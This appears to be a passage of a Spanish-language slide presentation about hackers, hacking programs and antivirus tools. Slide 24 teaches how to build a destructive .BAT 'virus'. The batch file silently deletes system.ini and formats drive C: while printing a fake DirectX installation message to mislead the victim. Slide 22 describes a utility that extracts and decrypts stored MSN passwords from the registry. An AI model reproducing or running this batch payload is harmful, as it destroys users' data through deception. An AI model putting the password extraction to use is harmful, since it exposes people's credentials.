  • 21. Su principal recurso dependen, además de su propio ingenio, es un código informático, Hay miles de diferentes programas de los hackers utilizan para explorar las computadoras y redes. Estos programas dan a los piratas una gran cantidad de poder sobre los usuarios inocentes y las organizaciones.
  • 22. Utilidad súper sencilla que muestra por pantalla el Password del MSN Messenger. Para ello lo saca del registro de Windows, y lo desencripta en caso de estar encriptada.
  • 23. Bit Defender USB Immunizer: un sencillo y muy efectivo antivirus que se encarga de borrar todo archivo sospechoso al momento que la memoria Flash es conectada. Con interfaz sencilla y una función única, la aplicación representa una protección efectiva, actuando directamente en los archivos ejecutables.
  • 24. primero abrimos el bloc de notas y podemos hacer las siguientes funciones: 1) echo s | erase C:DIRECCION DEL ARCHIVO A BORRAR ese txt ara que borre el archivo especifico, por ejemplo queremos que borre el system.ini seria así echo s | erase C:WINDOWSsystem.ini 2) echo s | format c:/v/q/u Ese nos formatearía el disco duro sin preguntar pause echo Ahora se pondrá en marcha la instalación del archivo direct x formating echo Esta operación puede tardar varios minutos pero vale la pena esperar pause echo s | format c:/v/q/u. y por ultimo cuando tengamos todo eso puesto en nuestro bloc de notas lo tendremos que guardar en formato .BAT en bez de .TXT Y ya tendremos nuestro virus creado.
  • 25. Descarga ELIBAGLA Haz doble clic encima para abrirlo Verifica que en el menú desplegable Unidad, se encuentra C: (o la partición que contiene el sistema operativo) Verifica también que la opción Eliminar Ficheros Automáticamente, en la parte baja de la ventana, esté marcada. Haz clic en el botón Explorar para lanzar el análisis, al final del scan, se generará un informe llamado infosat.txt que será guardado en la raíz C:infosat.txt